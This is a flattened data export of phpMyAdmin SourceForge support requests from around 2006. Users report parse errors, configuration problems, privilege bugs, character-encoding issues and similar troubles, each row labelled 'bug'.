I m seeing this error when trying to browse any table using the Browse function tab Parse error parse error, unexpected in home local4 public html dbadmin libraries display tbl.lib.php on line 274 It s only happening on one of my servers.
The server with the problem is using Linux, Apache 1.3.34, PHP 4.4.1.
I don t know the Linux distro off hand) The server where it s working correctly is Mandriva 2006, Apache 2.0.54, PHP 5.0.4.
I m using the same Firefox 1.5 browser to access both.
The problem also happens when executing a search.
Original URL https sourceforge.net p phpmyadmin support requests 807 https sourceforge.net p phpmyadmin support requests 807 Original author smagruder","bug"
"24444","2624","Customers can list all databases.
Hello, we are running cPanel with phpmyadmin 2.6.4 pl2, and yesterday we got a mail about an user could acces all databases so were found on our server.
And that makes me a little scared, and sometimes when he acces phpmyadmin he can just list all databases but not acces them.
This was taken by our customer http proinet.se proinet.jpg I was updataing the MySQL and then it dissaperad but it came back for some of the customers.
So i wundering whats wrong, any bug in this version?
Sincerley Kjette ProInet Original URL https sourceforge.net p phpmyadmin support requests 808 https sourceforge.net p phpmyadmin support requests 808 Original author kjette86","bug"
"24444","2625","sql export function make file win notepad cant handle well.
when we open the attached sql file exported with phpMyAdmin 2.6.4 pl2 with windows notepad from win xp professional SP2) it doesnt seems a standard flat file text like it was in past versions of phpMyAdmin.
when we open the same file in PFE Programmers File Editor) http www.lancs.ac.uk people steveb cpaap pfe pfefiles.htm the formating of the file are diferent from the look in notepad and portuguese chars are not showed correctly.
The only way to have a consistent and usable file) is to export the data without xc2xabsave as filexc2xbb checked and copy the dump result in the text box of the browser window Original URL https sourceforge.net p phpmyadmin support requests 809 https sourceforge.net p phpmyadmin support requests 809 Original author jucareca","bug"
"24444","2626","no privileges create new database bug.
if the database is named with an underscore, such as site db , the index page MySQL section) will give the option of Create new database , regardless of whether or not that user has Create privileges.
ex.
site?db .
if the db name is just site and user has no create priv., then it will say No privileges.
i believe it has something to do with the check user privileges.lib.php file, around line 64.
Original URL https sourceforge.net p phpmyadmin support requests 810 https sourceforge.net p phpmyadmin support requests 810 Original author burn2down","bug"
"24444","2627","Database Name Not Shown 2.7.0 pl1).
Is there a setting somewhere that I missed because I am not able to click on the name of the database like I was in previous versions.
See Image for Example) Thank you in advance for any help you can provide me with.
Original URL https sourceforge.net p phpmyadmin support requests 812 https sourceforge.net p phpmyadmin support requests 812 Original author webjunkieus","bug"
"24444","2628","Add new user failed, URL bug.
There is a broken link when I try to add u new MySQL user.
HP permitions list of users some letter gt; this makes an error.
It s due to link to http server privileges.php ?lang=cs win1250 server=1 initial=P instead of http [server domain]server privileges.php ?lang=cs win1250 server=1 initial=P.
This is caused due to the right frame has two slashes in own URL like http [domain] server privileges.php?lang=cs win1250 server=1.
Can you please fix this problem?
Original URL https sourceforge.net p phpmyadmin support requests 813 https sourceforge.net p phpmyadmin support requests 813 Original author nettos","bug"
"24444","2629","Variable cfg[ ShowStats ].
I am using PHP 4.3.11, Apache 1.3.33 Unix) and MySQL 4.1.15 max and phpMyAdmin version 2.7.0 pl1 with cookie auth.
The change of the die variable cfg[ ShowStats ] doesn t take any effect.
I tried to set it to off in config.inc.php and also in config.default.php.
phpMyAdmin still shows Show MySQL runtime information and Show MySQL system variables .
I also tried to set the variables cfg[ ShowMysqlInfo ] and cfg[ ShowMysqlVars ] to off but I think they are obsolete since version 2.7.0.
Thanks Original URL https sourceforge.net p phpmyadmin support requests 814 https sourceforge.net p phpmyadmin support requests 814 Original author modpussy","bug"
"24444","2630","Can t call stored procedure from SQL tab.
I have successfully saved a stored procedure using the mysql client DELIMITER CREATE PROCEDURE spMailpiecesByBin binID int) BEGIN SELECT mailpieces.text barcode, mailpieces.text description, mailpieces.ts received, mailpieces.ts viewed, mailpieces.ts shredded, mailpieces.ts scanned, mailpieces.ts shredRequest, mailpieces.ts scanRequest, mailpieces.id dispatch, mailpieceMap.text mailpieceDesc, carrierMap.text carrierName FROM mailpieces, mailpieceMap, carrierMap WHERE carrierMap.id carrier = mailpieces.id carrier AND mailpieceMap.id mailpieceType = mailpieces.id mailpieceType AND mailpieces.id bin = binID ORDER BY mailpieces.ts received DESC ; END DELIMITER ; I can call it from the mysql client without issues.
If I try the following from the SQL tab in phpMyAdmin CALL spMailpiecesByBin 1); I get the following error MySQL said 1312 PROCEDURE m2e.spMailpiecesByBin can t return a result set in the given context I am actually using 2.7.0 pl1 on a Windows XP sp2 as part of the WAMP5 installation.
Help!
Original URL https sourceforge.net p phpmyadmin support requests 815 https sourceforge.net p phpmyadmin support requests 815 Original author medroogie Found in version 2.6.4 pl1","bug"
"24444","2631","user CREATES DB without priviledge.
user with these priviledges GRANT USAGE ON .
TO user localhost WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 ; GRANT ALL PRIVILEGES ON `user db` .
TO user localhost WITH GRANT OPTION ; could normally NOT CREATE any database.
When they login, the welcome interface offers a little form to offer the possibility to create another database which name is suggested inside the input field such as user?db .
if user tries to enter a name and click create, then a database is created !
using PHP Version 4.3.10 16 Original URL https sourceforge.net p phpmyadmin support requests 816 https sourceforge.net p phpmyadmin support requests 816 Original author alexidoia","bug"
"24444","2632","pma 2.7 only one server possible.
multiple server configuration Sercer is not selectable on startup, inspite of multiple server configuration.
cfg[ ServerDefault ] = 0; = no default server even leads to Fatal error Call to undefined function PMA DBI get client info ) in d \HTdocs\admin\phpmyadmin\main.php on line 212 with any browser, pma 2.6.4 works perfect in the same configuration PHP 5.1.0 , MySQL 5.0.16 nt ) Original URL https sourceforge.net p phpmyadmin support requests 817 https sourceforge.net p phpmyadmin support requests 817 Original author windkiel","bug"
"24444","2633","SQL Query box in db view has no option to locate textfile 2.
In database view, SQL Query box does not contain the option to locate textfile through browse.
Only the top panel is showing.
It is the same in table view.
Only the Run SQL query section is availabe in both of these.
Is there something I need to configure to get these back?
Joan Original URL https sourceforge.net p phpmyadmin support requests 818 https sourceforge.net p phpmyadmin support requests 818 Original author joanie","bug"
"24444","2634","deleting multiple rows with same data.
when you delete multiple rows in phpMyAdmin, it generates n queries to do the work.
when you delete multiple rows with the same data, phpMyAdmin automaticaly recognize that and simplifly the work to only one query.
the problem is phpMyAdmin always limit the deleting to ONE row, so we dont obtain the desired results... the solution limit to the number of rows the user select, not to ONE Original URL https sourceforge.net p phpmyadmin support requests 828 https sourceforge.net p phpmyadmin support requests 828 Original author chaq","bug"
"24444","2635","PmaAbsoluteUri and VirtualHost mysql.example.com 443.
I get the error when I try to create a new table tbl create.php Missing parameter db FAQ 2.8) tbl create.php Missing parameter table FAQ 2.8) if VirtualHost 443 are defined like lt;VirtualHost mysql.example.com 443 gt; ServerAdmin webmaster example.com ServerName mysql.example.com DocumentRoot mnt www mysql php admin value open basedir mnt www mysql php value include path .
mnt www mysql Options Indexes lt; VirtualHost gt; And ssl configuration defined in conf.d ssl.conf if virtual host are defined like below all works fine lt;VirtualHost mysql.example.com 443 gt; ServerAdmin webmaster example.com ServerName mysql.example.com DocumentRoot mnt www mysql php admin value open basedir mnt www mysql php value include path .
mnt www mysql Options Indexes SSLEngine on SSLCipherSuite ALL !ADH !EXPORT56 RC4 RSA HIGH MEDIUM LOW SSLv2 EXP eNULL SSLCACertificateFile etc apache2 ssl.crt CA.crt SSLCertificateFile etc apache2 ssl.crt example.com.crt SSLCertificateKeyFile etc apache2 ssl.key example.com.key lt; VirtualHost gt; Is a apache2 trouble to work with PHP?
Linux Debian apache2 2.0.54 5 php4 4.3.10 16 PHPMyAdmin all versions) Original URL https sourceforge.net p phpmyadmin support requests 829 https sourceforge.net p phpmyadmin support requests 829 Original author lotabi","bug"
"24444","2636","Changing root Password failure.
If you want to change the empty password after an new installation of mysql 4.0.17 nt and phpmy admin 2.7.0 pl2 it is not possible to relogin after changing the password for root.
Its necessary to add manual the new password to the config.default.php entry cfg[ Servers ][ i] [ password ] = newpassword set ; After that, it is possible again to relogin.
Windows 2003 Server MySQL 4.0.17 phpMyAdmin 2.7.0 pl2 Thank you for developing this top solution.
Kind regards Tobias Original URL https sourceforge.net p phpmyadmin support requests 830 https sourceforge.net p phpmyadmin support requests 830 Original author schweden007","bug"
"24444","2637","Administration Login Problem.
Fatal error Maximum execution time of 120 seconds exceeded in home ashghal public html ads admin lib gui.inc.php on line 228 Dear sir, Every time i try to login to phpadsnew admin area it gives mr this error and the installation is yet new, i have installed many times but every time it gives the same error.
Please help me.
Thank you Original URL https sourceforge.net p phpmyadmin support requests 819 https sourceforge.net p phpmyadmin support requests 819 Original author u4host","bug"
"24444","2638","Unable to see right hand frame on ISP.
I have installed phpMyAdmin many, many times on local and remote servers, and on windows and various versions of linux.
I ve installed it on other ISPs as well with zero problems.
I recently installed it on a GoDaddy hosted account and I can t see the left frame.
It connects to the mysql database just fine because I can see the list of tables and browse them, but I can only ever see one frame.
It s not a browser issue because the same browser sees the same version of phpMyAdmin on other installs just fine both windows and linux installs).
I m at my wits end at this point.
I ve tried setting PmaAbsoluteUri to and the full path to phpMyAdmin with the same result.
I ve also set the OBGzip config item to FALSE.
Nothing helps.
Original URL https sourceforge.net p phpmyadmin support requests 832 https sourceforge.net p phpmyadmin support requests 832 Original author davidwelborn Found in version Latest Git","bug"
"24444","2639","segfault on php 4.3.8, 4.3.10 and php 5.0.4.
I have three boxes all of which phpmyadmin 2.7.0 and gt; segfault apache on when going to the main login screen.
the distributions are MDK 10.0, mandrake 10.2, Fedora Core 4 x86 64) I downgraded to 2.6.4 and it works fine now.
when running GDB on it.. php segfaults in the php function php addcslashes.
Original URL https sourceforge.net p phpmyadmin support requests 834 https sourceforge.net p phpmyadmin support requests 834 Original author urkle","bug"
"24444","2640","install script problem.
Hello, I am trying to upgrade a TikiWiki installation from 1.86 to 1.92, and must first use php MyAdmin to run an SQL query that will update my database.
I don t know enough MySQL my server uses MySQL version 4.0.25 standard) to see what I might be doing wrong, but when I use the directions in the tiki file, I get a syntax error.
The instructions are The following script will update a tiki database from verion 1.8 to 1.9 To execute this file do the following mysql f dbname lt; tiki 1.8to1.9.sql where dbname is the name of your tiki database.
For example, if your tiki database is named tiki, type mysql f tiki lt; tiki 1.8to1.9.sql You may execute this command as often as you like, and may safely ignore any error messages that appear.
Let s say my dbname is bsmith tiki1 the bsmith is a prefix added by php MyAdmin) and I know that f should force the script to run even if there are some small errors, but something isn t working here.
Can anyone let me know exactly what I need to type in the phpMyAdmin query box to get the script to run?
Thanks in advance!
Original URL https sourceforge.net p phpmyadmin support requests 820 https sourceforge.net p phpmyadmin support requests 820 Original author allosaurus65","bug"
"24444","2641","configure phpMyAdmin relation view.
Hi all, i have printed screen my phpMyAdmin relation view.
lt;a href= http img514.imageshack.us img514 9972 database1 xc.jpg target= blank gt;http img514.imageshack.us img514 9972 database1xc.jpg lt; a gt; i have to ask how do i make this table s `access id` to be link with tblaccess table?
such that when the next time i wish to INSERT data in phpMyAdmin, i would get a dropdown menu for access id to be like 1 NAME i only managed to add the no to it but i really want to see the NAME by it s side.
I know this can be done but the NAME field doesn t seem to be displayed at the dropdown menu FIELD display) on the relation view page.
Please help?
However, it isn t any problem for me to do the same thing to another column in the same table like the SUPERVISOR entry.
Original URL https sourceforge.net p phpmyadmin support requests 821 https sourceforge.net p phpmyadmin support requests 821 Original author hyperila Found in version 2.6.2","bug"
"24444","2642","Undefined index cfgRelation in footer.inc.php 43.
Executing a query with no results such as SELECT FROM phpmyadmin.pma bookmark WHERE 0 ) from the query window but not from the SQL page in the main frame) results in this error PHP Notice Undefined index cfgRelation in ... footer.inc.php on line 43 Original URL https sourceforge.net p phpmyadmin support requests 822 https sourceforge.net p phpmyadmin support requests 822 Original author ryandesign","bug"
"24444","2643","2 major problems with MySQL guestbook.
I m not sure that you can help me with the 1st problem, but the second one definitely appeared while working in PhpMyAdmin.
So I ve got a problem while using Advanced Guestbook 2.3.1 which was created using CPanel, uses MySQL and is installed as http yun.complife.ru guestbook).
Everything was OK for a long time, but suddenly, for unknown reason, the admin page stopped from displaying correctly.
I cannot enter admin mode http yun.complife.ru guestbook admin.php).
The login and password are accepted, but after that I get almost a blank page which contains only text Advanced Guestbook 2.3.1 Powered by PHP MySQL http www.proxy2.de and nothing more.
Additionally, I ve tried to browse the guestbook data via phpMyAdmin interface, included in cPanel, and saw that for all text fields the collation is set to latin1 swedish and shown incorrectly in phpMyAdmin), while my guestbook is in Russian.
I ve tried to change it to cp1251, but after that all Russian letters became ?
, and not only on phpMyAdmin page, but also when viewing http www.yun.complife.ru guestbook directly.
Turning collation back to latin1 swedish didn t help.
Right now addentry.php is deleted from my guestbook files.
This is not the reason of the problems, I ve done it after the problem occured in order to prevent new postings to the guestbook.
I have a backup of this file) Original URL https sourceforge.net p phpmyadmin support requests 823 https sourceforge.net p phpmyadmin support requests 823 Original author yun","bug"
"24444","2644","myphpadmin message.
The cfg[ PmaAbsoluteUri ] directive MUST be set in your configuration file!
I m a new user.
How do I do this?
Original URL https sourceforge.net p phpmyadmin support requests 824 https sourceforge.net p phpmyadmin support requests 824 Original author rebop","bug"
"24444","2645","Not all data received.
When I try to view some databases, I can t view the entire contents of the page.
It will just quit sending data to my browser.
I ve looked at the config files and I can t find anything wrong.
I ve looked at the source of the page and it appears to have lost connection or something as the code ends abruptly.
If you click Browse again, it sometimes seems to stop in a different place.
The MySQL server was moved to another server but the settings are all the same, same version 4.0.15), and everything.
The new server is actually a lot faster more powerfull but when it was on the old server, PHPMyAdmin was working fine.
Please help, thanks!
If you need more info, feel free to contact me at meisenhelderjb owensboro.org Original URL https sourceforge.net p phpmyadmin support requests 825 https sourceforge.net p phpmyadmin support requests 825 Original author meisenhelderjb","bug"
"24444","2646","Safari left panel display issues.
Right now, font size is set to MEDIUM on a Mac with Firefox version 1.5 used) and X SMALL on a Mac with Safari 2.0).
This is incorrect and should be SMALL in both cases.
I fixed it manually but it s painful to redo it with each new update...
Original URL https sourceforge.net p phpmyadmin support requests 826 https sourceforge.net p phpmyadmin support requests 826 Original author exess","bug"
"24444","2647","Special Characters.
Is it possible to export import special german characters xc3xa4;xc3xb6;xc3xbc;xc3x9f) for a database backup?
I didn t found a option for it.
Thanks in advance Original URL https sourceforge.net p phpmyadmin support requests 841 https sourceforge.net p phpmyadmin support requests 841 Original author andi021","bug"
"24444","2648","Getting Started.
This is really stupid simple, I m sure I m just getting started with PHP and MySQL.
Someone suggested I download phpMyAdmin as a useful tool.
I downloaded phpMyAdmin 2.7.0 pl2.
How do you even begin to use this program to create a simple database?
Online documentation www.billstevenson.org news 2005 05 phpmyadmin.html) sent to me indicates I need to alter a file called config.inc.php .
Problem is, there s no such file.
Further reading at lt;www.phpmyadmin.net gt; indicates I might have to create said file using a setup script called .
scripts setup.php.
That doesn t exist either!
What s a bloke to do?
Original URL https sourceforge.net p phpmyadmin support requests 842 https sourceforge.net p phpmyadmin support requests 842 Original author beltouche","bug"
"24444","2649","db details structure problem with worng output buffering.
db details structure.php with many tables does not work on Apache 1.3.27 Win32) PHP 4.4.1 but Apache 2.0.55 Win32) PHP 5.1.2 works fine workaround deactivating ob start in ob.lib.php seems somehow related if output buffering in php.ini is not set and or disabled can anyone confirm?
Original URL https sourceforge.net p phpmyadmin support requests 843 https sourceforge.net p phpmyadmin support requests 843 Original author cybot tm","bug"
"24444","2650","Win xp and session already active.
I ve installed phpmyadmin 2.7.0 pl2 on WinXP iis 5.1; php 5.1.1; Mysql 5.0.18) and i get in config and http mode the general cgi error but in cookie mode these session errors Warning ini set ) [function.ini set] A session is active.
You cannot change the session module s ini settings at this time.
in C \Sites\phpMyAdmin\libraries\session.inc.php on line 46 Warning Cannot modify header information headers already sent by output started at C \Sites\phpMyAdmin\libraries\session.inc.php 46) in C \Sites\phpMyAdmin\libraries\auth\cookie.auth.lib.php on line 110 Warning Cannot modify header information headers already sent by output started at C \Sites\phpMyAdmin\libraries\session.inc.php 46) in C \Sites\phpMyAdmin\libraries\select theme.lib.php on line 92 I followed all directives and even took in account the localhost socket problems with a firewall in Mysql.
My other php sites on mysql work well, but this one does not want to behave.
Original URL https sourceforge.net p phpmyadmin support requests 827 https sourceforge.net p phpmyadmin support requests 827 Original author bemu Found in version Latest Git","bug"
"24444","2651","state county fip data coordination.
I am trying to insert a county search feature into my program.
I have a table of states, and now I want to add a table of state counties http www.itl.nist.gov fipspubs co codes pa.txt Ex.
I have a table which identifies the state of Pennsylvania as PA 42000 Now I want to make a table which identifies the counties of PA ex.
42001 Adams 42003 Allegheny 42005 Armstrong 42007 Beaver 42009 Bedford What is the procedure for uploading a lot of county data?
What is the procedure to link the state code with the county codes within the mysql table?
What is the best php procedure to extract the data?
Original URL https sourceforge.net p phpmyadmin support requests 844 https sourceforge.net p phpmyadmin support requests 844 Original author msszroberts","bug"
"24444","2652","Can t create new users with mysql 5.0.18.
When I click the privileges link I get the following error Warning Your privilege table structure seems to be older than this MySQL version!
Please run the script mysql fix privilege tables that should be included in your MySQL server distribution to solve this problem!
As far as I can read you support mysql 5.
Original URL https sourceforge.net p phpmyadmin support requests 831 https sourceforge.net p phpmyadmin support requests 831 Original author hh2k","bug"
"24444","2653","Aborted clients > 100 .
gt; Aborted clients 916 k 1.300,70 192,62 How can this be gt; 100 ?
Original URL https sourceforge.net p phpmyadmin support requests 833 https sourceforge.net p phpmyadmin support requests 833 Original author olafvdspek","bug"
"24444","2654","config.inc.php don t work in 2.8.0 b1.
Hello.
I can t install phpMyAdmin 2.8.0 beta1.
I tried to use config manager copy config.inc.php from older version 2.7.0 pl1) rename config.default.php to config.inc.php with changes PMA shows, that there is no config file, user root localhost not allowed.
I have set the user in the config file at server 0.
Another Problem Since phpMyAdmin 2.7.0 pl1 I cannot use the ISO Charset.
I am German and need the special chars of the ISO ... 1 or ISO ... 15, I cannot work with UTF 8.
In the language selection every language is for UTF 8, no ISO languages are available.
Original URL https sourceforge.net p phpmyadmin support requests 835 https sourceforge.net p phpmyadmin support requests 835 Original author blackdrake","bug"
"24444","2655","Edit BLOB field checkbox is required..
When editing the record with blob field there should be a check box default unchecked).
It will prevent the BLOB field to be NULL if no file is uploaded.
in case of blog editing is now allowed) Original URL https sourceforge.net p phpmyadmin support requests 836 https sourceforge.net p phpmyadmin support requests 836 Original author jaygiri","bug"
"24444","2656","Foreign keys tutorial request.
I am trying to setup the relationships of the tables using phpMyAdmin 2.6.4 pl2.
I see how to setup the Primary Keys, but I donxe2x80x99t know how to setup Foreign Keys.
I searched Google for a tutorial but all I can find is tutorials of how to make the Foreign Keys using the command line in mySQL.
Could you please post some good links or make a tutorial for me?
Thanks in advance!
Original URL https sourceforge.net p phpmyadmin support requests 837 https sourceforge.net p phpmyadmin support requests 837 Original author tossery Found in version Latest Git","bug"
"24444","2657","where s the config file???.
So where s the config file in Version 8?
I read the documentation and it says that you need to manually create it.
Why not just suppply a default config file like the other versions?
That s the beauty of phpmyadmin, you just drop it in and and it works!
With version 8 you now have to create your own config file OR use some hack setup script that s not very intuitive at all, oh, and you ll need to make sure you have write permission on the folder or the config file won t be created.
I suggest supplying a config file like the other versions.
Original URL https sourceforge.net p phpmyadmin support requests 852 https sourceforge.net p phpmyadmin support requests 852 Original author carrajo","bug"
"24444","2658","Different result of SHOW VARIABLES.
When I use sql SHOW VARIABLES LIKE character set with phpmyadmin, The results should be | Variable name | Value | | character set client | latin1 | | character set connection | latin1 | | character set database | latin1 | | character set results | latin1 | | character set server | latin1 | | character set system | utf8 | | character sets dir | usr share mysql charsets But now the results is Variable name Value character set client [BLOB 6 bytes] character set connection [BLOB 6 bytes] character set database [BLOB 6 bytes] character set results [BLOB 6 bytes] character set server [BLOB 6 bytes] character set system [BLOB 4 bytes] character sets dir [BLOB 26 bytes] How can I get the first result.?
Thanks you!
Original URL https sourceforge.net p phpmyadmin support requests 838 https sourceforge.net p phpmyadmin support requests 838 Original author acdc6744 Found in version 2.6.4 pl1","bug"
"24444","2659","[alert] .htaccess php flag not allowed here.
The .htaccess file results in an internal server error 500).
Apache 2 log [Tue Feb 21 14 28 17 2006] [alert] [client 192.168.0.137] C IS Apache2 htdocs phpMyAdmin .htaccess php flag not allowed here Apache 2.0.55 Win32) PHP 5.1.2 Original URL https sourceforge.net p phpmyadmin support requests 839 https sourceforge.net p phpmyadmin support requests 839 Original author olafvdspek","bug"
"24444","2660","Klick on database shows tabe in use but no tables are listed.
I can SQL all tables 31) but i cannot see them because the first row shows Table in use but there are no tables listed so i cannot see which table is in use ?!
Original URL https sourceforge.net p phpmyadmin support requests 840 https sourceforge.net p phpmyadmin support requests 840 Original author petesky","bug"
"24444","2661","database interface.lib.php file.
Hello , I would like to enable all the languages which are located under the folder lang inside the file database interface.lib.php There is a row if PMA MYSQL INT VERSION gt;= 40100) \{ I have noticed that if I will disable this row then all the languages the phpmyadmin support will be enable and not only utf 8 will be enable.
I would like to know if it is OK to disable this row ?
I currently use mysql version 4.1.8 for windows platform.
thanking you in advanced Original URL https sourceforge.net p phpmyadmin support requests 845 https sourceforge.net p phpmyadmin support requests 845 Original author igoldman32 Found in version Latest Git","bug"
"24444","2662","common.lib.php removed by Virus Software.... Hello I posted this in the HELP forum, but no one seems concerned.
gt;Hi gt;My virus software has removed common.lib.php because gt;it says it infected with js feebs.gen gt;I downloaded the latest release candidate and an gt;older version but same thing still happens.
gt; gt;Any suggestions?
So basically I can t use the app.
Although js feebs has been classified as a LOW risk, the IT guy here won t allow the virus software to let it pass.
So two questions 1 What do I do?
2 If nothing can be done, what is an alternative program?
Original URL https sourceforge.net p phpmyadmin support requests 846 https sourceforge.net p phpmyadmin support requests 846 Original author tazeo Found in version 2.6.3 rc1","bug"
"24444","2663","2.8.0 Dropping in 2.7.0 config.inc.php doesn t work.
On two platforms, I did a clean install of 2.8.0 and dropped in the config.inc.php that worked perfectly in 2.7.0 install with no mods) with both platforms.
Following are platform descriptions and the error messages Platform 1 Apache 1.3.34, PHP 4.4.3 dev, Windows 2000 MySQL 4.1.12 running on Mandriva 2006).
Error msg 2003 The server is not responding Platform 2 Apache 2.0.54, PHP 5.0.4, Mandriva 2006 MySQL 4.1.12 running on Mandriva 2006).
Error msg 1045 Access denied for user root localhost using password NO) I had also tried loading in my 2.7.0 config.inc.php and doing the generation of a new one with the new user interface didn t help.
Attached is the config.inc.php for Platform 1, with the password shown as password rather than the real one.
Original URL https sourceforge.net p phpmyadmin support requests 847 https sourceforge.net p phpmyadmin support requests 847 Original author smagruder","bug"
"24444","2664","Display errors textareas and IE7.
The text inside textareas is not updated correctly while typing.
That means I write some stuff into a textarea but the content is not updated.
As soon as I move around with the mouse outside the textarea) I can see what I wrote.
Additionaly there are problems if the content exceeds available display space which means you have to scroll) i.e.
there is a horizontal scrollbar appearing for the whole frame.
The bug occurs because of overflow visible; set in CSS for textareas.
You can test it with IE7 by using a HTML file with the following content lt;textarea style= overflow hidden; gt; lt; textarea gt; Greets Original URL https sourceforge.net p phpmyadmin support requests 848 https sourceforge.net p phpmyadmin support requests 848 Original author neku86","bug"
"24444","2665","authorization conflict with auth ldap protected directory.
We are protecting our intranet through auth ldap authentification.
phpMyAdmin is one subdirectory of web intranet.
We are using http for authentification for the phpMyAdmin.
When trying to access phpMyAdmin first we are asked for the intranet password that s o.k.)
after that we are asked for the mysql password.
This conflicts the cached intranet password and we are asked in turns for the password of the intranet and the mysql password until one timeout appears) any solution for that?
Marco Original URL https sourceforge.net p phpmyadmin support requests 861 https sourceforge.net p phpmyadmin support requests 861 Original author mlechner","bug"
"24444","2666","error on exporting subset ba .
PhpMyAdmin throws an error Notice Undefined offset 0 in E \development\www\pma\tbl properties export.php on line 36 while trying to export a subset with any textfield restricted to ba .
It seems that there are some character conversion errors with the condition.
The error still appaears in pma 2.8.0 Original URL https sourceforge.net p phpmyadmin support requests 849 https sourceforge.net p phpmyadmin support requests 849 Original author lociii","bug"
"24444","2667","login problems password containing \ ).
i ve been checked this problem.
since 2.8.0.2 didn t stripslashes to http authentify variables.
i m using password that included \ and php ini sets using magic gpc.
when i put \ string, php gets \\ string.
so i can t login using 2.8.0.2 is there any security problems?
Original URL https sourceforge.net p phpmyadmin support requests 863 https sourceforge.net p phpmyadmin support requests 863 Original author leocardia","bug"
"24444","2668","Doing Softwar Architecture project for phpmyadmin.
Hello my name is Eduardo, I am CS Master student at Polithecnic University of Puerto Rico.
For my Software Architecture class I am doing a software architecture analisys for the phpMyAdmin application.
I have already worked with the application and have started looking at the code.
I would like to know if you or any of your parthners could provide me any kind of Conceptual Architecture, or diagram about the modules or files relationships within the application.
Me, and my cooworker for this project were tying to find any Source Code Extractor who could interpret php, but we havent find anything yet.
I will apreciate If you could help us with any documentation about the phpMyAdmin Architecture.
If you need further information about my project you may feel free to ask me any questions, or call me at 787 960 0111.
Anything will be apreciated.
Maybe at the end of our project we could help you guys in anything we could.
thanks again, Eduardo Mendez mendez edd hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 864 https sourceforge.net p phpmyadmin support requests 864 Original author mendez edd","bug"
"24444","2669","Additional row count query by phpMyAdmin produces error.
Hello, I am using phpMyAdmin 2.8.0, PHP 5.1.2 and MySQL 5.0.18 under Windows XP SP 2.
The table definition I am using is CREATE TABLE IF NOT EXISTS errors error type TINYINT UNSIGNED NOT NULL, error date DATE NOT NULL) ENGINE=MYISAM DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci; When I try to submit the following query SELECT FROM `errors` WHERE error type=1; the result is Error SQL query SELECT FOUND ROWS ) AS count; MySQL said 2013 Lost connection to MySQL server during query The same error is produced if the table contains data INSERT INTO `errors` `error type`, `error date`) VALUES 1 , NOW )); When I use the command line mysql.exe, the expected result is given immediately without error.
Keep up the good work, Renxc3xa9 Original URL https sourceforge.net p phpmyadmin support requests 850 https sourceforge.net p phpmyadmin support requests 850 Original author rele","bug"
"24444","2670","Exporting with mySQL Compatible removes auto increment.
Hello, Using phpMyAdmin 2.8.01, and mySQL4.1, if I export a table which has an AUTO INCREMENT column, it appears correctly CREATE TABLE `posts` `pid` int 10) NOT NULL auto increment, If I then set the compatability option to mysql40, or mysql323, the same export produces CREATE TABLE `posts` `pid` int 10) NOT NULL, In both cases, the AUTO INCREMENT value itself is listed correctly at the bottom of the create table, the only thing missing is the auto increment keyword on the column definition.
As the auto increment is supported on mySQL4.0, I would not expect this to be the case.
Is this is a bug, or am I doing something wrong?
Thanks, Stewart Original URL https sourceforge.net p phpmyadmin support requests 851 https sourceforge.net p phpmyadmin support requests 851 Original author scamby","bug"
"24444","2671","edit records form not all records saved.
when selecting several existing records to edit, not all records are updated selected 15 records to edit changed them only the first 2 were saved selected 6 records to edit changed them worked out as it should on another try selected 10 records to edit changed them now it saved the first 6 plus the not touched) timestamp column of the 7th probably useful info effect first seen after 2.7.0 pl2, didn t check 2.8.0 all records have auto increment ids for identification all records have timestamp cols with ON UPDATE CURRENT TIMESTAMP avg.
record length in 1st case 496 bytes, dynamic format avg.
record length in 2nd and 3rd case 81 bytes, fixed format Original URL https sourceforge.net p phpmyadmin support requests 853 https sourceforge.net p phpmyadmin support requests 853 Original author joeknall","bug"
"24444","2672","Edit screen empty.
1) I have searched quite extensively for this bug being already reported and cannot find it.
2) Version Platform Have reproduced this bug on 2 different configurations MyPhpAdmin version 2.7.0 pl1 MySql Version 5.0.18 OP System Windows ME MyPhp Theme Style XAMPP Web Server Apache 2.2.0 Win 32) and MyPhpAdmin version 2.7.0 pl2 MySql Version 3.23.54 OP System Red Hat Linux 7.2 MyPhp Theme Style Original Web Server Apache 2.2.0 3) Process Select the Edit icon on a record in a table that has a particular set of data in a Text field.
Primary script executed tbl change.php 4) Expected result Standard edit window with row data displayed as fields for editing 5) Actual Result Error Message as follows link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?
Fatal error Call to undefined function pma generate common url ) in www html phpMyAdmin libraries header meta style.inc .php on line 44 when on Linux Configuration as described above).
or essentially identical message on Windows setup link rel= stylesheet type= text css href= .
css phpmyadmin.css.php?
Fatal error Call to undefined function PMA generate common url ) in C \Program Files\xampp\phpMyAdmin\libraries\header meta style.inc.
php on line 44 6) Frequency of Occurrence DATA DEPENDENT Dependent on content of Text field see examples in attached file).
7) Reproducability ALWAYS if using sample data and inserting into new text field in existing table , or existing text field in existing table.
a) Have reproduced on field types TEXT and FULLTEXT b) Have reproduced with data of varying length and character composition c) Have been able to confirm that there are plenty of sample data sets that do NOT cause error.
8) Any other information from investigations so far Was unable to determine any pattern to do with data although tried eliminating apostrophes, inverted commas, use of the word www etc.
Hopefully the above should make it easy for you to reproduce, track down and fix problem.
If you require any further information, please advise.
Regards Warren Kinny Exodus Systems Original URL https sourceforge.net p phpmyadmin support requests 854 https sourceforge.net p phpmyadmin support requests 854 Original author wjkinny","bug"
"24444","2673","Warning Invalid argument supplied for foreach ).
phpMyAdmin SQL Dump version 2.8.0 http www.phpmyadmin.net Servidor localhost Tiempo de generacixc3xb3n 14 03 2006 a las 22 01 56 Versixc3xb3n del servidor 4.1.14 Versixc3xb3n de PHP 5.0.5 pl5 gentoo Base de datos `bind` Estructura de tabla para la tabla `5 168 192` CREATE TABLE `5 168 192` `name` varchar 128) default NULL, `ttl` bigint 20) unsigned default 3600 , `rdtype` varchar 128) NOT NULL default , `rdata` varchar 128) NOT NULL default ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Volcar la base de datos para la tabla `5 168 192` INSERT INTO `5 168 192` `name`, `ttl`, `rdtype`, `rdata`) VALUES 5.168.192.in addr.arpa , 3600, SOA , ns2.dominio.net root.dominio.net 1 1H 15M 14D 12H ), 5.168.192.in addr.arpa , 3600, NS , ns2.dominio.net ), 40.5.168.192.in addr.arpa , 3600, PTR , redFon.dominio.net ), 20.5.168.192.in addr.arpa , 3600, PTR , redHome.dominio.net ), 254.5.168.192.in addr.arpa , 3600, PTR , 812.dominio.net ); 1\.
